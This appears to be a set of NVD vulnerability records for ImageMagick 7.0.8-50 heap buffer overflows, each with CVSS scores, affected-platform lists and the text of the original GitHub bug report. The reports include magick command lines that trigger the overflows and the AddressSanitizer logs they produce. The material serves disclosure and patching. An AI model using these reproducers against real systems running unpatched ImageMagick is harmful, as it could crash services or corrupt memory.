[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1609
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/threshold.c:328:11 in AdaptiveThresholdImage. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 -dispose Background "(" magick:netscape -lat 514x0-41 ")" "(" magick:granite -charcoal 3 -level 0%,125,0.328 ")" -combine -print "" tmp` Here's ASAN log. ``` ==22189==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x620000001090 at pc 0x7fd7e5dd4be2 bp 0x7ffd816c3a30 sp 0x7ffd816c3a28 READ of size 4 at 0x620000001090 thread T0 #0 0x7fd7e5dd4be1 in AdaptiveThresholdImage MagickCore/threshold.c:328:11 #1 0x7fd7e5386cb6 in CLISimpleOperatorImage MagickWand/operation.c:2571:21 #2 0x7fd7e537bc78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #3 0x7fd7e53a1315 in CLIOption MagickWand/operation.c:5273:16 #4 0x7fd7e51e2a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #5 0x7fd7e51e3d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #6 0x7fd7e522dba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #7 0x526f95 in MagickMain utilities/magick.c:149:10 #8 0x5268e1 in main utilities/magick.c:180:10 #9 0x7fd7dfca4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x41b069 in _start (install/bin/magick+0x41b069) Address 0x620000001090 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/threshold.c:328:11 in AdaptiveThresholdImage ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/threshold.c:328:11 in AdaptiveThresholdImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1609/comments
2
2019-06-21T06:02:04Z
2019-07-08T01:48:56Z
https://github.com/ImageMagick/ImageMagick/issues/1609
459,024,141
1,609
487
CVE-2019-13298
2019-07-05T01:15:10.110
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/pixel-accessor.h in SetPixelViaPixelInfo because of a MagickCore/enhance.c error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d4fc44b58a14f76b1ac997517d742ee12c9dc5d3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1611" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d4fc44b58a14f76b1ac997517d742ee12c9dc5d3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1611" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1611
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 "(" magick:netscape -random-threshold 66x4 -resize 72%+20-45 ")" "(" magick:netscape -shear 40 -enhance ")" tmp` Here's ASAN log. ``` ================================================================= ==6928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7faaff40fa80 at pc 0x7fab0dddcb45 bp 0x7fff3e3ee2b0 sp 0x7fff3e3ee2a8 WRITE of size 4 at 0x7faaff40fa80 thread T0 #0 0x7fab0dddcb44 in SetPixelViaPixelInfo ./MagickCore/pixel-accessor.h:804:56 #1 0x7fab0ddf1234 in EnhanceImage MagickCore/enhance.c:1976:7 #2 0x7fab0d63a171 in CLISimpleOperatorImage MagickWand/operation.c:2284:21 #3 0x7fab0d632c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #4 0x7fab0d658315 in CLIOption MagickWand/operation.c:5273:16 #5 0x7fab0d499a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #6 0x7fab0d49ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #7 0x7fab0d4e4ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #8 0x526f95 in MagickMain utilities/magick.c:149:10 #9 0x5268e1 in main utilities/magick.c:180:10 #10 0x7fab07f5bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x41b069 in _start (install/bin/magick+0x41b069) 0x7faaff40fa80 is located 0 bytes to the right of 905856-byte region [0x7faaff332800,0x7faaff40fa80) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7fab0ded3ed6 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7fab0dc1c61c in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7fab0dc22901 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7fab0dc28bc9 in SyncImagePixelCache MagickCore/cache.c:5488:28 #5 0x7fab0de87831 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7fab0dde375f in EnhanceImage MagickCore/enhance.c:1891:7 #7 0x7fab0d63a171 in CLISimpleOperatorImage MagickWand/operation.c:2284:21 #8 0x7fab0d632c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #9 0x7fab0d658315 in CLIOption MagickWand/operation.c:5273:16 #10 0x7fab0d499a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7fab0d49ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7fab0d4e4ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7fab07f5bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow ./MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1611/comments
2
2019-06-21T06:07:48Z
2019-07-08T01:49:17Z
https://github.com/ImageMagick/ImageMagick/issues/1611
459,025,805
1,611
488
CVE-2019-13299
2019-07-05T01:15:10.187
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/8187d2d8fd010d2d6b1a3a8edd935beec404dddc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1610" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/8187d2d8fd010d2d6b1a3a8edd935beec404dddc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1610" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1610
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 "(" magick:netscape -monochrome ")" "(" magick:netscape +repage ")" -geometry 433%-80-57 -adjoin -evaluate-sequence Median tmp` Here's ASAN log. ``` ==30168==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7febb7ba1400 at pc 0x7febc5808632 bp 0x7ffd269baff0 sp 0x7ffd269bafe8 READ of size 4 at 0x7febb7ba1400 thread T0 #0 0x7febc5808631 in GetPixelChannel ./MagickCore/pixel-accessor.h:116:10 #1 0x7febc5805ff6 in EvaluateImages MagickCore/statistic.c:587:33 #2 0x7febc4e1a5bf in CLIListOperatorImages MagickWand/operation.c:4084:22 #3 0x7febc4e2435e in CLIOption MagickWand/operation.c:5279:14 #4 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #5 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #6 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #7 0x526f95 in MagickMain utilities/magick.c:149:10 #8 0x5268e1 in main utilities/magick.c:180:10 #9 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x41b069 in _start (install/bin/magick+0x41b069) 0x7febb7ba1400 is located 0 bytes to the right of 248832-byte region [0x7febb7b64800,0x7febb7ba1400) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7febc569fed6 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7febc53e861c in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7febc53ee901 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7febc53f4bc9 in SyncImagePixelCache MagickCore/cache.c:5488:28 #5 0x7febc5653831 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7febc54187e2 in AcquireImageColormap MagickCore/colormap.c:144:10 #7 0x7febc575d137 in AssignImageColors MagickCore/quantize.c:514:7 #8 0x7febc5753f38 in QuantizeImage MagickCore/quantize.c:2724:14 #9 0x7febc53ae56c in SetImageType MagickCore/attribute.c:1495:14 #10 0x7febc4e0cace in CLISimpleOperatorImage MagickWand/operation.c:2792:18 #11 0x7febc4dfec78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x7febc4e24315 in CLIOption MagickWand/operation.c:5273:16 #13 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x526f95 in MagickMain utilities/magick.c:149:10 #17 0x5268e1 in main utilities/magick.c:180:10 #18 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow ./MagickCore/pixel-accessor.h:116:10 in GetPixelChannel ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1610/comments
6
2019-06-21T06:05:24Z
2019-10-25T13:50:32Z
https://github.com/ImageMagick/ImageMagick/issues/1610
459,025,122
1,610
489
CVE-2019-13300
2019-07-05T01:15:10.250
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/a906fe9298bf89e01d5272023db687935068849a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1586" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/5e409ae7a389cdf2ed17469303be3f3f21cec450" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/a906fe9298bf89e01d5272023db687935068849a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1586" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/5e409ae7a389cdf2ed17469303be3f3f21cec450" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1586
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in MagickCore/statistic.c:654:41 in .omp_outlined._debug__.10 ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick "-black-point-compensation" "-interlace" "none" "(" "magick:rose" "-density" "302x531" ")" "(" "magick:granite" "+repage" ")" "-antialias" "-evaluate-sequence" "Log" ""` This is about heap-buffer-overflow log using ASAN. ``` ==27479==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000018800 at pc 0x0000006205ab bp 0x7ffd7a503310 sp 0x7ffd7a503308 WRITE of size 8 at 0x629000018800 thread T0 #0 0x6205aa in .omp_outlined._debug__.10 MagickCore/statistic.c:654:41 #1 0x621c5e in .omp_outlined..11 MagickCore/statistic.c:618:7 #2 0x7f79836bd452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7f79836771b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7f79836782b5 in __kmp_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x372b5) #5 0x7f798366b7be in 